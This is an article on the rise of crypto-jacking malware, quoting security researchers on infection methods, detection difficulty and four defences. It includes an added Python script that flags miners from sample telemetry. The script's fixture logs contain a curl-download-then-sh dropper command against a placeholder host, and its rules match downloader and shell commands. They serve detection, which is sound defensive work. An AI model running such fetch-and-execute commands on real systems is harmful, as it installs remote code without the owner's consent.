Crypto-jacking's alarming rise: How to defend against attacks

Crypto-jacking exploded on the malware scene at the end of last year and continues to grow in popularity. That's why organizations need to take steps to protect themselves from malicious crypto-mining attacks.

Crypto-jacking occurs when malware used to mine virtual currency is placed surreptitiously on a computer, other device, or web browser. The bad app "cooks" in the background, generating money for the attacker and headaches for the victim.

During the last quarter of 2017, only 13% of businesses reported malicious crypto-miners on their systems, according to Fortinet's first-quarter threat landscape report. That number more than doubled in the first three months of 2018, to 28%.

Matt Downing, principal threat intelligence researcher at Alert Logic, a consulting and managed security services provider, said the increase was alarming.

"The volume of coin-mining attack attempts that we're seeing eclipses all other motives."
—Matt Downing

At the end of last year, the spike in crypto-jacking was insane, said Adam Kujawa, director of the labs at Malwarebytes, an anti-malware software maker.

"We've never seen any type of malware detected that much."
—Adam Kujawa

What's so appealing to net bandits about coin mining is that it's less risky than other forms of cybercrime. Dave Jevans, CEO of CipherTrace, a provider of cryptocurrency anti-money laundering, blockchain forensics, and enforcement, said virtual currencies are practically untrackable, and that miners are less likely to appear on the radar of law enforcement authorities than, say, ransomware.

"If you take a hospital offline, people care a lot. If you slow down people's computers a bunch, the cops probably aren't coming after you."
—Dave Jevans

Here's what your organization needs to understand about crypto-jacking, along with four ways to defend against it.


Time-tested techniques

Malicious crypto-miners use tried-and-true techniques to attack systems. These include phishing, drive-by downloads, exploitation of known vulnerabilities, cross-site scripting, and SQL injection.

For the less technically adept, automation tools are available, said Vishruta Rudresh, senior cybersecurity researcher at Kudelski Security, a custom cybersecurity solutions provider.

"There are crypto-mining kits available on the dark web for as little as $30."
—Vishruta Rudresh

Alert Logic's Downing added that the bulk of crypto-mining attacks he has seen deploy cookie-cutter components. "They're using cut-and-paste exploits and simple shell scripts," he noted.

And malicious crypto-miners aren't shy about exploiting vulnerabilities suitable for any kind of malicious activity. "Drupal vulnerabilities can be exploited to drop any arbitrary payload, but crypto-mining is a popular one right now," said Michael Marriott, a research analyst with Digital Shadows, a threat intelligence company.

Crypto-jackers are also exploiting the EternalBlue vulnerability used by the WannaCry ransomware attack and the Apache Struts vulnerability exploited in the Equifax data breach, which compromised the personal information of 145.5 million people.

One crypto-mining method that departs from typical attacks, however, involves infecting a browser. When a visitor lands on a compromised website, malicious JavaScript is injected into the user's browser. That turns the browser into a crypto-miner.

What makes that form of crypto-mining insidious is that it works across platforms. "It works on the Mac, Windows, and Android, which makes the threat more widespread," CipherTrace's Jevans observed.

"In many cases, crypto-mining can be picked up with antivirus software, but how many people have antivirus on a Mac or Android?"
—Dave Jevans

Why crypto-mining is hard to catch

Typical signs of a crypto-mining operation include increased CPU usage, degraded system performance, and sluggish application responsiveness. Demands imposed by crypto-mining can have serious consequences. "In one instance, crypto-mining software was known to destroy the device that hosted it," Kudelski's Rudresh said.

Even if signs of crypto-jacking appear on a system, finding the malware can be challenging. System defenses that depend on software signatures and anomalies, such as modified files or system data, can struggle to identify crypto-mining malware when it lands on a network.

"Crypto-miners do not modify files, and their anomalous behavior is limited to increased CPU usage or power consumption," Rudresh said. "That can be hard to attribute specifically to a crypto-miner, since there can be other applications—games, for instance—that tend to over-consume the processing capabilities of a system."

Increased CPU usage is easier for an individual to recognize than it is for a typical enterprise. "A large organization may observe it in hindsight, following increased electricity bills and a degradation of performance by the affected machines," Digital Shadows' Marriott said.

How to protect yourself from crypto-jackers

What can organizations do to protect themselves from malicious crypto-miners? Here are four recommendations from security experts:

1. Solid security hygiene matters

The baseline of any good cybersecurity defense scheme is solid security hygiene. That's true for lowering the risk of crypto-mining, too. "A lot of these attacks are just a hygiene issue," Alert Logic's Downing said. "The vast majority of these attacks are opportunistic. An attacker is going to run a number of exploits on your site, and if you have them patched, that strategy won't work."

2. Double down on common attack defenses

Since crypto-miners employ many of the same techniques as other malicious actors, defenses should be locked down against common attack vectors. These include malicious links, poisoned email attachments and files, and infected websites and applications.

3. Browser extensions deliver good blocking

When a crypto-miner is running in a victim's browser, the injected script has to be fetched from, and report its results back to, the miner's own sites. Blocking access to those sites from within the browser will ruin a crypto-miner's day. In Google's Chrome browser, there are free extensions such as No Coin and minerBlock that automate the blocking. Ad-blocking extensions such as AdBlocker can also be configured manually to block known crypto-mining sites.

4. Network monitoring can net the bad ones

Crypto-mining attacks follow a pattern. They'll typically run a known exploit against an application, then deliver a "dropper" script that loads the crypto-mining malware from the Internet. The malware then starts consuming CPU and connects to public mining pools to submit its work. Each of those stages can be identified with vigilant network monitoring.
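As an added example (not code from the article or from any vendor quoted in it), the Python below correlates the four stages described in point 4, plus the sustained-CPU signal from the "hard to catch" section, across a few constructed telemetry lines and refuses to call a host a miner on high CPU alone. The line format, hostnames, the pool blocklist, and the list of common pool ports are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample telemetry for this example (not from the article).
# Assumed line format: "<timestamp> <host> <TYPE> <details...>".
SAMPLE_LOGS = """\
2018-04-02T10:00:01 web01 IDS exploit-attempt sig=web-app-rce-known
2018-04-02T10:00:04 web01 PROC curl -s http://dropper.example.invalid/x.sh -o /tmp/x.sh
2018-04-02T10:00:05 web01 PROC sh /tmp/x.sh
2018-04-02T10:00:09 web01 FLOW dst=pool.example.invalid:3333 bytes=1200
2018-04-02T10:15:00 web01 CPU pct=98 minutes=15
2018-04-02T10:16:00 wks07 CPU pct=97 minutes=20
2018-04-02T10:20:00 wks07 FLOW dst=cdn.example.invalid:443 bytes=40000
"""

# Placeholder blocklist of public pool hostnames (assumed; a real deployment
# loads a maintained list). Pool ports are an assumed, weaker second signal.
POOL_HOSTS = {"pool.example.invalid"}
POOL_PORTS = {3333, 4444, 5555, 7777}
DOWNLOADERS = ("curl ", "wget ")
SHELLS = ("sh ", "bash ")

def stages_by_host(log_text):
    """Map each host to the sorted list of attack stages seen for it."""
    seen = defaultdict(set)
    downloaded = set()  # hosts that fetched a script into /tmp, not yet run
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, host, kind, detail = line.split(" ", 3)
        if kind == "IDS" and "exploit-attempt" in detail:
            seen[host].add("exploit")          # stage 1: known exploit
        elif kind == "PROC":
            if detail.startswith(DOWNLOADERS) and "/tmp/" in detail:
                downloaded.add(host)
            elif detail.startswith(SHELLS) and host in downloaded:
                seen[host].add("dropper")      # stage 2: download then run
        elif kind == "FLOW":
            m = re.search(r"dst=([^:]+):(\d+)", detail)
            if m and (m.group(1) in POOL_HOSTS or int(m.group(2)) in POOL_PORTS):
                seen[host].add("pool")         # stage 4: public mining pool
        elif kind == "CPU":
            m = re.search(r"pct=(\d+) minutes=(\d+)", detail)
            if m and int(m.group(1)) >= 90 and int(m.group(2)) >= 10:
                seen[host].add("cpu")          # stage 3: sustained high CPU
    return {h: sorted(s) for h, s in seen.items()}

def verdict(stages):
    """High CPU alone is ambiguous (a game can cause it); require corroboration."""
    if "pool" in stages and len(stages) >= 2:
        return "likely-cryptominer"
    if stages == ["cpu"]:
        return "high-cpu-only"
    return "suspicious" if stages else "clean"
```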

Crypto-jacking may be just the beginning

Crypto-mining malware can do more than just mine crypto-currency. "It's well-versed in espionage," Kudelski's Rudresh said. Its repertoire can include dropping additional malware on a system, exploiting unpatched vulnerabilities, stealing passwords, and monitoring user activity.

The steps for infecting a machine with crypto-mining malware are the same as those used by any threat actor. First, compromise a machine, then install the malware. "Once the threat actor has that access, they can install their malware of choice," Digital Shadows' Marriott explained.

Right now crypto-miners don't seem very interested in engaging in other malicious activity with their malware.

"We don't typically see any sort of secondary activity. The attackers are very single-minded. They deploy their mining software and let it run."
—Matt Downing

However, that may not be the case in the future. "After the value of crypto-currency drops, suddenly all these infected systems with miners may start pushing out something else, like ransomware," Kujawa said.

Compared to other types of malware, including ransomware, crypto-mining software may seem relatively benign. That's not the case, however. "If an actor has exploited a vulnerability to mine crypto-currency, that vulnerability can also be exploited to drop other payloads," Marriott explained. "In this sense, it can be indicative of a wider problem."

It's the means by which the actor was able to install the crypto-miner in the first place that should be of real concern, Marriott stressed.

"If they have this access, there are countless different types of payloads that they can then install, ranging from malware that gathers information from your machines to others that might sabotage your network."
—Michael Marriott
